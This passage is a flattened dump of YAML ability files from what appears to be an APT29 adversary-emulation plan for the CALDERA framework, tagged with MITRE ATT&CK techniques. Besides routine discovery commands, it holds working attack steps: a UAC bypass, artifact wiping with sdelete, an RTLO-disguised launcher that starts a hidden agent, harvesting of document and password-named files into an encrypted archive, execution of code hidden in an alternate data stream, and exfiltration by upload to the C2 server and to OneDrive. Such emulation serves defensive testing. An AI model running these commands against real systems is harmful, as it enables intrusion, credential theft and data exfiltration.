bypass sdctl 6 | tactic: defensive-evasion 7 | technique: 8 | attack_id: T1088 9 | name: Access Token Manipulation (T1134) 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepFourteen_bypassUAC.ps1; 15 | bypass; 16 | payload: stepFourteen_bypassUAC.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/5ff80022-8d85-410b-b868-6c7565b267e5.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 5ff80022-8d85-410b-b868-6c7565b267e5 4 | name: 3.B - Registry Cleanup for UAC Bypass Technique 5 | description: Delete registry entries post-UAC bypass. 6 | tactic: defensive-evasion 7 | technique: 8 | attack_id: T1112 9 | name: Modify Registry 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force; 15 | if (!(test-path -path HKCU:\Software\Classes\Folder)) { 16 | write-host "[+] Reg keys removed!"; 17 | } 18 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/68b588bc-002a-42dc-bac7-9189f944065b.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 68b588bc-002a-42dc-bac7-9189f944065b 4 | name: 3.A - Staging monkey PNG 5 | description: Staging PNG for Lateral Movement 6 | tactic: defensive-evasion 7 | technique: 8 | attack_id: T1036 9 | name: masquerading 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | $username="#{profile_user}"; 15 | if ( $(test-path -path "C:\Users\$username\Downloads\monkey.png") -eq $false ) { 16 | copy-item monkey.png -Destination "C:\Users\$username\Downloads\\" -Force; 17 | if ($? -eq $True) { 18 | write-host "[+] Successfully copied monkey.png!"; 19 | get-childitem -path "C:\Users\$username\Downloads\\"; 20 | exit 0; 21 | } else { 22 | write-host "[+] Failed to copy monkey.png."; 23 | exit 1; 24 | } 25 | 26 | } else { 27 | write-host "[*] monkey.png already exists within C:\users\$username\Downloads..." 28 | } 29 | payload: monkey.png 30 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/9b5b5aec-32ff-4d74-8555-727b50ab15f6.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 9b5b5aec-32ff-4d74-8555-727b50ab15f6 4 | name: 4.B.2 - Artifact Cleanup - Delete Files 5 | description: Cleanup files related to Operation 6 | tactic: defensive-evasion 7 | technique: 8 | attack_id: T1107 9 | name: File Deletion 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | if (! $(test-path -path "C:\Program Files\SysInternalsSuite";)) { 15 | write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; 16 | exit 1; 17 | } 18 | Set-Location -path "C:\Program Files\SysInternalsSuite"; 19 | gci $env:userprofile\Desktop; 20 | .\sdelete64.exe /accepteula "$env:USERPROFILE\Desktop\‮cod.3aka3.scr"; 21 | .\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"; 22 | .\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysInternalsSuite.zip"; 23 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/0cfadbcb-ec21-44ae-adb7-9a23176dd620.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 0cfadbcb-ec21-44ae-adb7-9a23176dd620 4 | name: 13.A - Enumerate Computer Name 5 | description: Triage host for ComputerNameNetBIOS,ComputerNameDnsHostname,ComputerNameDnsDomain,ComputerNameDnsFullyQualified,ComputerNamePhysicalNetBIOS,ComputerNamePhysicalDnsHostname,ComputerNamePhysicalDnsDomain,ComputerNamePhysical,DnsFullyQualifie 6 | tactic: discovery 7 | technique: 8 | attack_id: T1082 9 | name: System Information Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepThirteen.ps1; 15 | comp; 16 | payload: stepThirteen.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/144b1384-5060-494f-80eb-91772695cdf3.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 144b1384-5060-494f-80eb-91772695cdf3 4 | name: 2.D.2 - System Service Discovery (T1007) 5 | description: The net utility is executed via cmd to enumerate local active services. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1007 9 | name: System Service Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net start -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/1c8552c7-f7ed-4523-b640-72d65af5f855.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 1c8552c7-f7ed-4523-b640-72d65af5f855 4 | name: 16.A - Enumerate Domain Controller 5 | description: Get domain controller and current user SID for the domain 6 | tactic: discovery 7 | technique: 8 | attack_id: T1018 9 | name: Remote System Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\powerview.ps1; 15 | get-netdomaincontroller; 16 | payload: powerview.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/24ed020e-4730-4000-b6b4-6b5d3e95314f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 24ed020e-4730-4000-b6b4-6b5d3e95314f 4 | name: 4.A.2 - Remote System Discovery (T1018) 5 | description: The net utility is executed via cmd to enumerate hosts within the domain. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1018 9 | name: Remote System Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | cmd.exe /c net group "Domain Computers" /domain -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/26181249-be75-41ed-9fe7-5c30ea8c2d4d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 26181249-be75-41ed-9fe7-5c30ea8c2d4d 4 | name: 2.F.2 - Permissions Groups Discovery (T1069) 5 | description: The net utility is executed via cmd to enumerate members of the domain controller’s administrators group. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1069 9 | name: Permission Groups Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net localgroup administrators /domain -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/2b5a72b1-01e4-48ae-98b0-2570a7894371.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 2b5a72b1-01e4-48ae-98b0-2570a7894371 4 | name: 12.C - Detect Software 5 | description: Detect software on host 6 | tactic: discovery 7 | technique: 8 | attack_id: T1518 9 | name: Software Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepTwelve.ps1; 15 | software; 16 | payload: stepTwelve.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/2ff877b4-0c00-401e-9d3f-070c70b610df.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 2ff877b4-0c00-401e-9d3f-070c70b610df 4 | name: 2.D.1 - System Service Discovery (T1007) 5 | description: The sc utility is executed via cmd to enumerate local active services. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1007 9 | name: System Service Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | sc query -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/35d95b64-c1f8-4ac7-a2f2-8959218239cd.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 35d95b64-c1f8-4ac7-a2f2-8959218239cd 4 | name: 2.B.1 - System Owner / User Discovery (T1033) 5 | description: The native echo command is executed via cmd to enumerate local environment variables associated with current user and domain. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1033 9 | name: System Owner/User Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | echo %USERDOMAIN%\%USERNAME% -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/41610306-087c-4c34-874b-37b8ed633a36.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 41610306-087c-4c34-874b-37b8ed633a36 4 | name: 2.C.2 - Process Discovery (T1057) 5 | description: The tasklist utility is executed via cmd to enumerate local running processes. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1057 9 | name: Process Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | tasklist /v -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/59592c35-8207-4896-8d8b-36ad4600245d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 59592c35-8207-4896-8d8b-36ad4600245d 4 | name: 4.A.1 - Remote System Discovery (T1018) 5 | description: The net utility is executed via cmd to enumerate DCs within the domain 6 | tactic: discovery 7 | technique: 8 | attack_id: T1018 9 | name: Remote System Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | cmd.exe /c net group "Domain Controllers" /domain -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/5c23f638-9cfc-4fc4-9cab-4af628fef70a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 5c23f638-9cfc-4fc4-9cab-4af628fef70a 4 | name: 2.H.1 - Query Registry (T1012) 5 | description: The reg utility is executed via cmd to enumerate a specific Registry key associated with local system policies to ensure that the user will not be prompted for credentials when elevating permissions. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1012 9 | name: Query Registry 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/5df12481-9d8c-4235-b550-9cefc8ed7361.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 5df12481-9d8c-4235-b550-9cefc8ed7361 4 | name: 2.C.1 - Process Discovery (T1057) 5 | description: API call(s) are executed to enumerate local running processes. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1057 9 | name: Process Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | Import-Module .\ps.ps1 -Verbose -Force; 15 | ProcessList 16 | payload: ps.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/5f4263c4-7ff1-4098-b5f5-f41faa31cf5b.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b 4 | name: 4.B.1 - System Network Configuration Discovery (T1016) 5 | description: The netsh utility is executed via cmd to enumerate local firewall configuration information. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1016 9 | name: System Network Configuration Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | netsh advfirewall show allprofiles -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/61221fb9-cb32-46d5-98fd-90567a621526.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 61221fb9-cb32-46d5-98fd-90567a621526 4 | name: 2.G.1 - Account Discovery (T1087) 5 | description: The net utility is executed via cmd to enumerate domain user accounts. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1087 9 | name: Account Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net user /domain -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/646be6c9-f27a-4f5f-be5d-b8a0317e215f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 646be6c9-f27a-4f5f-be5d-b8a0317e215f 4 | name: 4.B.1 - Process Discovery 5 | description: List running process on the machine via PowerShell. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1057 9 | name: Process Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | $ps = get-process; 15 | write-output $ps; 16 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce 4 | name: 2.A.2 - System Network Configuration Discovery (T1016) 5 | description: The arp utility is executed via cmd to enumerate local ARP configuration information. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1016 9 | name: System Network Configuration Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | arp -a 15 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/6f1f4768-7099-45d2-a858-b49dc792234e.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 6f1f4768-7099-45d2-a858-b49dc792234e 4 | name: 4.C - Loading Stage-2 & Performing Discovery 5 | description: Load Stage-2 from Modified Sysinternals Toolset 6 | tactic: discovery 7 | technique: 8 | attack_id: T1082 9 | name: System Information Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { 15 | write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; 16 | exit 1; 17 | } 18 | 19 | Set-Location -path "C:\Program Files\SysInternalsSuite"; 20 | if (!(test-path ".\readme.ps1")) { 21 | Move-Item .\readme.txt readme.ps1 -Force; 22 | } 23 | . .\readme.ps1; 24 | Invoke-Discovery; 25 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/7c2a6e5b-1adb-464f-a581-4677391f8dd6.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 7c2a6e5b-1adb-464f-a581-4677391f8dd6 4 | name: 2.E.2 - System Information Discovery (T1082) 5 | description: The net utility is executed via cmd to enumerate local operating system configuration. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1082 9 | name: System Information Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net config workstation -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/84377d7a-0363-44fd-a082-44657ca1858f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 84377d7a-0363-44fd-a082-44657ca1858f 4 | name: 2.F.3 - Permissions Groups Discovery (T1069) 5 | description: The net utility is executed via cmd to enumerate members of the domain administrators group. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1069 9 | name: Permission Groups Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | cmd.exe /c net group "Domain Admins" /domain 15 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/96140694-6d13-40b6-9553-0e63533469f3.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 96140694-6d13-40b6-9553-0e63533469f3 4 | name: 13.B - Enumerate Domain Name 5 | description: Domain triage 6 | tactic: discovery 7 | technique: 8 | attack_id: T1082 9 | name: System Information Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepThirteen.ps1; 15 | domain; 16 | payload: stepThirteen.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76 4 | name: 2.G.2 - Account Discovery (T1087) 5 | description: The net utility is executed via cmd to enumerate detailed information about a specific user account. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1087 9 | name: Account Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net user %USERNAME% /domain -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/a34ab8f2-a106-41fb-af0b-cf5382bd18ae.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: a34ab8f2-a106-41fb-af0b-cf5382bd18ae 4 | name: 13.D - Enumerate Processes 5 | description: Process triage 6 | tactic: discovery 7 | technique: 8 | attack_id: T1057 9 | name: Process Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepThirteen.ps1; 15 | pslist; 16 | payload: stepThirteen.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/a42be479-fc26-4d7c-9e63-7a9b74e4c8d2.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: a42be479-fc26-4d7c-9e63-7a9b74e4c8d2 3 | name: 16.B - Enumerate Domain SID (T1033) 4 | description: Get domain user SID 5 | tactic: discovery 6 | technique: 7 | attack_id: T1033 8 | name: System Owner/User Discovery 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | . .\stepSixteen_SID.ps1; 14 | siduser; 15 | payload: stepSixteen_SID.ps1 16 | parsers: 17 | plugins.evals.app.parsers.sid: 18 | - source: target.sid 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/ba0b398d-91b8-490a-bed2-f959afa8e1aa.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: ba0b398d-91b8-490a-bed2-f959afa8e1aa 4 | name: 4.C.1 - System Network Connections Discovery (T1049) 5 | description: The netstat utility is executed via cmd to enumerate local active network connections. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1049 9 | name: System Network Connections Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | netstat -ano -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/d2ea2676-7f85-4228-b980-ab3c0e1adc03.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: d2ea2676-7f85-4228-b980-ab3c0e1adc03 4 | name: 2.E.1 - System Information Discovery (T1082) 5 | description: The systeminfo utility is executed via cmd to enumerate local operating system configuration. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1082 9 | name: System Information Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | systeminfo -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/d5170a60-3bdc-44e0-9870-a38db5c0cf81.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: d5170a60-3bdc-44e0-9870-a38db5c0cf81 4 | name: 9.A.1 - File and Directory Discovery (T1083) 5 | description: PowerShell's Get-ChildItem alias 'ls' is used to enumerate files in a remote file share. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1083 9 | name: File and Directory Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | ls #{remote.file.share} 15 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/ee08a427-1e1d-4d8a-aeb1-978a7fcf9087.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: ee08a427-1e1d-4d8a-aeb1-978a7fcf9087 4 | name: 2.A.1 - System Network Configuration Discovery (T1016) 5 | description: The ipconfig utility is executed via cmd to enumerate local TCP/IP network configuration information. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1016 9 | name: System Network Configuration Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | ipconfig /all -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/f320eebd-e75b-4194-b529-79e64ad0b9ee.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: f320eebd-e75b-4194-b529-79e64ad0b9ee 4 | name: 13.C - Enumerate Username 5 | description: user triage 6 | tactic: discovery 7 | technique: 8 | attack_id: T1033 9 | name: System Owner/User Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepThirteen.ps1; 15 | user; 16 | payload: stepThirteen.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/f9c0b150-822f-497b-ad6d-187f24561e9a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: f9c0b150-822f-497b-ad6d-187f24561e9a 4 | name: 12.B - Detect Anti-Virus 5 | description: Detect anti-virus software on host 6 | tactic: discovery 7 | technique: 8 | attack_id: T1063 9 | name: Security Software Discovery 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\stepTwelve.ps1; 15 | detectav 16 | payload: stepTwelve.ps1 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/discovery/faa96e7f-081a-40b7-a743-a6a7f2627ea3.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: faa96e7f-081a-40b7-a743-a6a7f2627ea3 4 | name: 2.F.1 - Permissions Groups Discovery (T1069) 5 | description: The net utility is executed via cmd to enumerate members of the local system's administrators group. 6 | tactic: discovery 7 | technique: 8 | attack_id: T1069 9 | name: Permission Groups Discovery 10 | platforms: 11 | windows: 12 | cmd: 13 | command: | 14 | net localgroup administrators -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/08e57385-dbce-4850-8bb7-589ef79465ab.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 08e57385-dbce-4850-8bb7-589ef79465ab 3 | name: 9.B.1 - Automated document collection (T1119) 4 | description: Execute PowerShell collection command to collect and compress files of specific extensions. 5 | tactic: execution 6 | technique: 7 | attack_id: T1086 8 | name: PowerShell 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | move-item Rar.exe -Destination C:\Windows\Temp -Force; 14 | $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force; 15 | cd C:\Windows\Temp; 16 | .\Rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip"; 17 | payload: rar.exe 18 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/571845f6-b75c-4b9d-a666-a78f7827261f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 571845f6-b75c-4b9d-a666-a78f7827261f 3 | name: 1.A - RTLO Start Sandcat (T1036) 4 | description: Perform RTLO technique with SANDCAT 5 | tactic: execution 6 | technique: 7 | attack_id: T1036 8 | name: RTLO Override 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Sleep 3; 14 | $bin = Get-ChildItem *cod*scr*; 15 | $arguments = '-server "#{server}" -group "rtlo_group"'; 16 | start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments; 17 | 18 | if ($?) { 19 | write-host "Successfully completed RTLO execution. A new agent should appear"; 20 | exit 0; 21 | 22 | } else { 23 | write-host "Failure of RTLO execution."; 24 | exit 1; 25 | } 26 | payload: ‮cod.3aka.scr.exe 27 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/95564347-e77a-4a89-b08f-dcafa5468f2c.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 95564347-e77a-4a89-b08f-dcafa5468f2c 3 | name: 8.A.1 - Remote System Discovery (T1018) 4 | description: Custom PowerShell script to perform AD triage for domain bound computers. 5 | tactic: execution 6 | technique: 7 | attack_id: T1086 8 | name: PowerShell 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | 14 | if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { 15 | write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; 16 | exit 1; 17 | } 18 | 19 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 20 | . .\psversion.ps1; 21 | Ad-Search Computer Name *; 22 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/a5daa530-c640-49bc-aa54-6808789a684a.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: a5daa530-c640-49bc-aa54-6808789a684a 3 | name: 1.B - PowerShell (1086) 4 | description: Spawn powershell.exe from cmd.exe 5 | tactic: execution 6 | technique: 7 | attack_id: T1086 8 | name: PowerShell 9 | platforms: 10 | windows: 11 | cmd: 12 | command: | 13 | powershell.exe; 14 | if ($?) { 15 | write-host "[*] PowerShell successfully spawned"; 16 | exit 0; 17 | } 18 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/c4a59e39-53b0-4ace-9528-8ff052752ece.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: c4a59e39-53b0-4ace-9528-8ff052752ece 3 | name: 8.A.2 - Identifying current user on other machines 4 | description: Custom PowerShell script to perform AD triage for domain bound computers. 5 | tactic: execution 6 | technique: 7 | attack_id: T1086 8 | name: PowerShell 9 | platforms: 10 | windows: 11 | psh: 12 | command: | 13 | Invoke-Command -ComputerName "$(hostname)" -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId -Last 1; 14 | parsers: 15 | plugins.evals.app.parsers.sessionid: 16 | - source: user.session.id 17 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/execution/e506f811-884d-4992-aacb-514b33a0324f.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: e506f811-884d-4992-aacb-514b33a0324f 3 | name: 11.A - Click .LNK payload 4 | description: Execute PowerShell collection command to collect and compress files of specific extensions. 5 | tactic: execution 6 | technique: 7 | attack_id: T1204 8 | name: Execution - User Execution via .lnk 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; 14 | 15 | if(Test-Path -LiteralPath "$env:appdata\Microsoft\kxwn.lock"){ 16 | Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; 17 | Write-Host "Removed old kxwn.lock file"; 18 | } 19 | 20 | powershell.exe Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX; 21 | cleanup: | 22 | Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; 23 | 24 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/exfiltration/2d18c8ec-4593-49dc-9bf4-11d0673d6ae6.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 3 | name: 9.B.8 - Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) 4 | description: Copy a target file from a remote file share through the existing C2 channel 5 | tactic: exfiltration 6 | technique: 7 | attack_id: T1041 8 | name: Exfiltration Over Command and Control Channel 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Import-Module .\upload.ps1 -Verbose -Force; 14 | Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload"; 15 | cleanup: | 16 | remove-item upload.ps1 -Force 17 | payload: upload.ps1 18 | 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/exfiltration/4840d6dd-da13-401a-be46-05db56f4e1e0.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 4840d6dd-da13-401a-be46-05db56f4e1e0 3 | name: 18.A - Exfiltrate data to OneDrive 4 | description: Transfer data to a OneDrive account 5 | tactic: exfiltration 6 | technique: 7 | attack_id: T1537 8 | name: Transfer Data to Cloud Account 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | $err = $(net use y: #{onedrive.url} /user:#{onedrive.username} "#{onedrive.password}" 2>&1); 14 | if($err -Like "*System error 85*") { 15 | Write-Host "OneDrive net drive is already mounted!"; 16 | } elseif($err -Like "*System error 67*") { 17 | Write-Host "OneDrive net drive mount failed - Check URL!"; 18 | Write-Host "#{onedrive.url}"; 19 | exit 1; 20 | } elseif($err -Like "*System error 1244*") { 21 | Write-Host "Could not authenticate to OneDrive - Check Creds!"; 22 | Write-Host "User: #{onedrive.username}"; 23 | Write-Host "Password: #{onedrive.password}"; 24 | exit 1; 25 | } 26 | 27 | Write-Host "Mount Successful" 28 | Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "y:\WindowsParentalControlMigration.tmp" -Force; 29 | if(!$?){ 30 | exit 1; 31 | } 32 | 33 | Write-Host "Copy Successfull" 34 | exit 0; 35 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/exfiltration/68e209dd-f354-4adc-8bc6-e85a3e55a7f4.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 68e209dd-f354-4adc-8bc6-e85a3e55a7f4 3 | name: 2.B.1 - Data from staged file (T1074) and 